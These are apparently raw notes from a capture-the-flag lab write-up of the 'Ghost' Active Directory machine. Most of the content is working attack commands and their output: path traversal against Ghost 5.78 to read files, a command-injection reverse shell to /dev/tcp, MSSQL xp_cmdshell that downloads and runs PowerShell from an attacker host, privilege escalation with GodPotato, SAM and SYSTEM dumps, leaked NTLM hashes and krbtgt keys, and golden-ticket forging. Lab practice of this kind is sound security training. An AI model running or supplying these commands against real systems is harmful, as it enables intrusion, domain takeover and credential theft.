| Machine IP | |
|---|---|
| 10.129.238.42 |
10.129.238.42
Enumeration 10.129.238.42
Nmap scan
rustscan -a 10.129.238.42 -u 5000 -- -sC -sV -Pn -oA 10.129.238.42
| Port | Service | Version |
|---|---|---|
| 53 | domain | syn-ack ttl 127 Simple DNS Plus |
| 80 | http | syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 |
| 88 | kerberos-sec | syn-ack ttl 127 Microsoft Windows Kerberos |
| 135 | msrpc | syn-ack ttl 127 Microsoft Windows RPC |
| 139 | netbios-ssn | syn-ack ttl 127 Microsoft Windows netbios-ssn |
| 443 | https? | syn-ack ttl 127 federation.ghost.htb (ADFS) |
| 445 | microsoft-ds? | syn-ack ttl 127 |
| 464 | kpasswd5? | syn-ack ttl 127 |
| 593 | ncacn_http | syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 |
| 636 | ssl/ldap | syn-ack ttl 127 Microsoft Windows Active Directory LDAP |
| 1433 | ms-sql-s | syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1000.00; RC0+ |
| 2179 | vmrdp? | syn-ack ttl 127 |
| 3268 | ldap | syn-ack ttl 127 Microsoft Windows Active Directory LDAP |
| 3269 | ssl/ldap | syn-ack ttl 127 Microsoft Windows Active Directory LDAP |
| 3389 | ms-wbt-server | syn-ack ttl 127 Microsoft Terminal Services - Issuer: commonName=DC01.ghost.htb - Signature Algorithm: sha256WithRSAEncryption - MD5: 7e9a:4e05:78e6:8e7a:ef13:1712:94cf:6279 - DNS_Computer_Name: DC01.ghost.htb - NetBIOS_Domain_Name: GHOST - ssl-cert: Subject: commonName=DC01.ghost.htb - NetBIOS_Computer_Name: DC01 - Not valid before: 2024-06-16T15:49:55 - Not valid after: 2024-12-16T15:49:55 - DNS_Tree_Name: ghost.htb - DNS_Domain_Name: ghost.htb - rdp-ntlm-info: - SHA-1: a19b:426c:3d83:7ff2:b680:93f4:f574:843a:99d0:bb8a - Public Key bits: 2048 - Public Key type: rsa - Target_Name: GHOST - Product_Version: 10.0.20348 |
| 5985 | http | syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 |
| 8008 | http | syn-ack ttl 127 nginx 1.18.0 Ghost 5.78 _/ghost/ /p/ /email/ /r/ /web/mentions/receive |
| 8443 | ssl/http | syn-ack ttl 127 nginx 1.18.0 core.ghost.htb /login |
| 49443 | unknown | syn-ack ttl 127 |
| 49664 | msrpc | syn-ack ttl 127 Microsoft Windows RPC |
| 49669 | msrpc | syn-ack ttl 127 Microsoft Windows RPC |
| 49671 | ncacn_http | syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 |
| 63593 | msrpc | syn-ack ttl 127 Microsoft Windows RPC |
| 64783 | msrpc | syn-ack ttl 127 Microsoft Windows RPC |
| 64826 | msrpc | syn-ack ttl 127 Microsoft Windows RPC |
Based on the nmap results we found following use full information
- Port 8443 has core.ghost.htb which has /login
- Port 8008 has Ghost 5.78 running it has 5 dir list _/ghost/ /p/ /email/ /r/ /web/mentions/receive
- What is port 2179?
- It’s Domain Controller DC01.ghost.htb
- Port 1443 running SQL Server 2022 RC0+
- Port 3389 is also there
- Port 5985 is also there.
Now we change the /etc/hosts file.
Port 8443
we have /login page which has href /api/login
The /api/login takes us to
https://federation.ghost.htb/adfs/ls/?SAMLRequest=nVPBcpswEP0VRneDwCQ2GuOMiw%2F1TJowNu2hl44sVjEzIFHtkjh%2FnwGbxIfWB1%2F1dt%2B%2Bffu0eDg2tfcKDitrUhb6nD0sFyibuhWrjg5mC387QPKOTW1QDEDKOmeElVihMLIBFKTEbvXjUUQ%2BF62zZJWtmbdZp%2BxPFM91HIfynut4n6g4KSMt94nWKknCmZ5CxO%2FmnGvm%2FRpFRD5n3gaxg41BkoZSFvEonvDZJLwrwlDwmYju%2FSkPfzMvP4%2F7VpmyMi%2FXte1PRSi%2BF0U%2ByZ93BfPWgFQZScPoA1GLIgg0lOCGN%2F%2FlYJH8A%2B0DWWoMagyYt0IE16OZNdg14HbgXisFP7ePXxzKOvjqFvM4np4oehOD1iJtAVtrENjJcTHs7C6svr6NHFWw5ZWZi%2BCCezztk2xgs85tXan3W067qmv7ljmQBCkj1wELRupzYKAc4pNZQ3C8KT6ZbVrpKuzvAkepaLTpkjirJeIW9C2mXS1TQvXUgCKXiG%2FWlX3SQBGUhZMGW%2BvobO2%2F9CxP2H%2Fs%2BEQvv9jyAw%3D%3D&SigAlg=http%3A%2F%2Fwww.w3.org%2F2001%2F04%2Fxmldsig-more%23rsa-sha256&Signature=YKbzuj2bhlsQOKybpQqOnhEi4OuQ0w%2BQUCvoWCmApSqGDAkpUh5gLYocD2oyTO%2Ftn2NO4P2RDa%2FMChq5PLcwO69oXoGgOeQ7kpVFv6vNa6xad5xi8RSP4GHXB29C1piQJ3Tj1JSS4fSqckKj1WrHpFMkb4WlT62EhSTFdRDZ9%2FQHZPYlH%2BXlSTQtdujH2vwaR53w3jWTke1ID%2B6ey%2FRkRXbzy3XwaCWjf0ACEVZcqpJeQy4VDUNdkkQVrcI0sPgEKYyMpDWw7P6PyutO6D41t4%2BxLlAmmzBcqj3rDW3keshIG42sCgWP8CEt%2FABiGIaGtC51Q%2BB4lVeaioXI5%2FgMMA%3D%3D
so we have one for subdomain now which is federation.ghost.htb:443
It takes us to this page.
so most probably once we login we get a certificate and then we can login .
Port 8008
new subdomain intranet
Secret token after ldap inject with brute.py
fgevlfymxrksvu9b
szrr8kpc3z6onlqf
gitea_temp_principal
GET /ghost/api/content/posts/?key=a5af628828958c976a3b6cc81a&extra=..%2f..%2f..%2f..%2f..%2f..%2fvar%2flib%2fghost%2fcontent%2fdata%2fghost.db HTTP/1.1
Host: ghost.htb:8008
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=UTF-8
X-Ghost-Version: 5.78
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://ghost.htb:8008/ghost/
GET /ghost/api/content/posts/?key=a5af628828958c976a3b6cc81a&extra=..%2f..%2f..%2f..%2f..%2f..%2fproc%2fself%2fenviron
!@yqr!X2kxmQ.@Xe
curl -X POST http://intranet.ghost.htb:8008/api-dev/scan \
-H "Content-Type: application/json" \
-H 'X-DEV-INTRANET-KEY: !@yqr!X2kxmQ.@Xe' \
-d '{
"url": "id; bash -i >& /dev/tcp/your_ip/4444 0>&1"
}'
JWT_SECRET=*xopkAGbLyg9bK_A
He!KA9oKVT3rL99j
Password for intranet_principal@GHOST.HTB: He!KA9oKVT3rL99j
#!/bin/bash
mkdir /root/.ssh
mkdir /root/.ssh/controlmaster
printf 'Host *\n ControlMaster auto\n ControlPath ~/.ssh/controlmaster/h:%%p\n ControlPersist yes' > /root/.ssh/config
sshpass -p 'uxLmt*udNc6t3HrF' ssh -o "StrictHostKeyChecking no" florence.ramirez@ghost.htb@dev-workstation exit
exec /app/ghost_intranet
ssh -S /root/.ssh/controlmaster/florence.ramirez@ghost.htb@dev-workstation:22 florence.ramirez@dev-workstation
ssh -S /root/.ssh/controlmaster/florence.ramirez@ghost.htb@dev-workstation:22 florence.ramirez@linux-dev-ws01
scp florence.ramirez@LINUX-DEV-WS01:/tmp/krb5cc_50 /path/to/local/directory/
mssqlclient.py 'interanet_principal@10.129.179.211' -windows-auth
uxLmt*udNc6t3HrF
SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > enable_xp_cmdshell
SQL > xp_cmdshell "whoami"
sliver playloads generated
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "iwr -Uri ''http://10.10.14.28/amsi64.txt'' -UseBasicParsing | iex"';
Used this one
(New-Object System.Net.WebClient).DownloadString('http://10.10.14.28/new.ps1') | IEX
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "iwr -Uri ''http://10.10.14.28/large1.ps1'' -UseBasicParsing | iex"';
nc -lvnp 1234
./donut -i /home/jay/vulnlab/breach/GodPotato-NET4.exe -a 2 -b 2 -o /tmp/payload.bin -p '-cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\new.ps1"'
execute -o cmd /c "reg save HKLM\system system"
execute -o cmd /c "reg save HKLM\sam sam"
download sam
download system
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee22097ca2d15cf2e2888c3bcb532b2d:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:41515af3ada195029708a53d941ab751:::
PRIMARY$:1000:aad3b435b51404eeaad3b435b51404ee:27f92da5e3d79962020ddebc08ed7d70:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:69eb46aa347a8c68edb99be2725403ab:::
GHOST$:1103:aad3b435b51404eeaad3b435b51404ee:dae1ad83e2af14a379017f244a2f5297:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:0242571591b83295b401697d5c883b8bcfd118461055040124f769efdeaea318
Administrator:aes128-cts-hmac-sha1-96:71e7ba32b52330913b23e4c6aeb5e6a5
Administrator:des-cbc-md5:313ee9100bea92a8
PRIMARY$:aes256-cts-hmac-sha1-96:7ce9898568e098a1a2c7e432392970c65359950e48a722f8ad56daaacb192791
PRIMARY$:aes128-cts-hmac-sha1-96:5a692a8b12206802d75f68d3ae3b4f0c
PRIMARY$:des-cbc-md5:7954bf5b9773a16d
krbtgt:aes256-cts-hmac-sha1-96:b0eb79f35055af9d61bcbbe8ccae81d98cf63215045f7216ffd1f8e009a75e8d
krbtgt:aes128-cts-hmac-sha1-96:ea18711cfd69feef0c8efba75bca9235
krbtgt:des-cbc-md5:b3e070025110ce1f
GHOST$:aes256-cts-hmac-sha1-96:3db833a897310f160ef3e277be7a6b9236637455a33c5af4c73ded94203d7c0b
GHOST$:aes128-cts-hmac-sha1-96:da9ac6706a5f1b240782fc36ed028917
GHOST$:des-cbc-md5:620d527c97fba726
Parent-child
proxychains -f /etc/proxychains4.conf lookupsid.py core.ghost.htb/Administrator@10.0.0.10 -hashes :41515af3ada195029708a53d941ab751
S-1-5-21-2034262909-2733679486-179904498
lookupsid.py ghost.htb/florence.ramirez@10.0.0.254 -domain-sids
S-1-5-21-4084500788-938703357-3654145966
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:69eb46aa347a8c68edb99be2725403ab:::
uxLmt*udNc6t3HrF
powershell.exe -ExecutionPolicy Bypass -Command "iwr -Uri ''http://10.10.14.28/large1.ps1'' -UseBasicParsing | iex"
wmiexec.py corp.ghost.htb/Administrator@DC01.ghost.htb -k -no-pass
ticketer.py -aesKey b0eb79f35055af9d61bcbbe8ccae81d98cf63215045f7216ffd1f8e009a75e8d -domain corp.ghost.htb -domain-sid S-1-5-21-2034262909-2733679486-179904498 -extra-sid S-1-5-21-4084500788-938703357-3654145966-519 Administrator